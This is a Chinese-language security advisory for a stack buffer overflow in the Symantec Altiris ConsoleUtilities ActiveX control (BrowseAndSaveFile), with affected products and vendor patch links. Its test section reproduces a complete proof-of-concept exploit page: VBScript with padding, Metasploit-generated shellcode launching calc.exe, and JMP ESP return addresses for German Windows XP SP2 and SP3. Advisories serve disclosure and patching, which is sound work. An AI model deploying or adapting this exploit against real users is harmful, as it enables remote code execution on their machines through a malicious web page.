漏洞起因
边界条件错误
影响系统
Altiris Deployment Solution 6.x
Altiris Notification Server 6.x
Symantec Altiris ConsoleUtilities ActiveX Control 6.x
Symantec Management Platform 7.x
不受影响系统
危害
远程攻击者可以利用漏洞以登录用户进程权限执行任意指令。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户点击。
漏洞信息
Symantec Altiris Deployment Solution是自动化的操作系统部署解决方案,用于从统一的位置部署和管理服务器、桌面和笔记本等。
在初次访问Altiris Deployment Solution等产品管理服务器的管理WEB站点时会安装一个ActiveX控件(AeXNSConsoleUtilities.dll),此函数"BrowseAndSaveFile"存在一个基于栈的缓冲区溢出:
Name: ConsoleUtilities Class
Vendor: Altiris, Inc.
Type: ActiveX-Steuerelement
Version: 6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder: C:\WINDOWS\system32
提交超长的字符串作为"BrowseAndSaveFile"函数的参数,可触发基于栈的缓冲区溢出,攻击者构建恶意WEB页,诱使用户解析可以应用程序权限执行任意指令。
测试方法
<html>
<title>NSOADV-2009-001</title>
<object classid=’clsid:B44D252D-98FC-4D5C-948C-BE868392A004′ id=’obj’/>
</object>
<script language=’vbscript’>
Sub Submit_OnClick
For i=0 to 2
If document.ret.os(i).checked Then
target=document.ret.os(i).value
End If
Next
EIP=unescape(target)
arg1 = ""
arg3 = ""
arg4 = ""
arg5 = ""
junk=String(310, "A") ‘junk
morejunk=String(18, unescape("%u0041")) ‘more junk
// windows/exec – 224 bytes
// http://www.metasploit.com
// Encoder: x86/call4_dword_xor
// EXITFUNC=seh, CMD=calc.exe
code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
"%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
"%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
"%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
"%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
"%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
"%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
"%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
"%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
"%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
"%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
"%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
"%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
"%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
buf=junk+EIP+morejunk+break+code
obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
—————————————————————-
<form name="ret">
<input type=radio name="os" value="%u4141%u4141">
DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5">
Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68">
Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>
厂商解决方案
用户可参考如下供应商提供的升级程序:
、Symantec Altiris Deployment Solution 6.9 SP1
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9 SP3 Build 430
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9.164
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9.176
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9.355
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
Symantec Altiris Deployment Solution 6.9.355 SP1
Symantec AltirisNSConsole.zip
https://kb.altiris.com/utility/getfile.asp?rid=6364&aid=49568
漏洞提供者
Nikolas Sotiriu
0 条评论。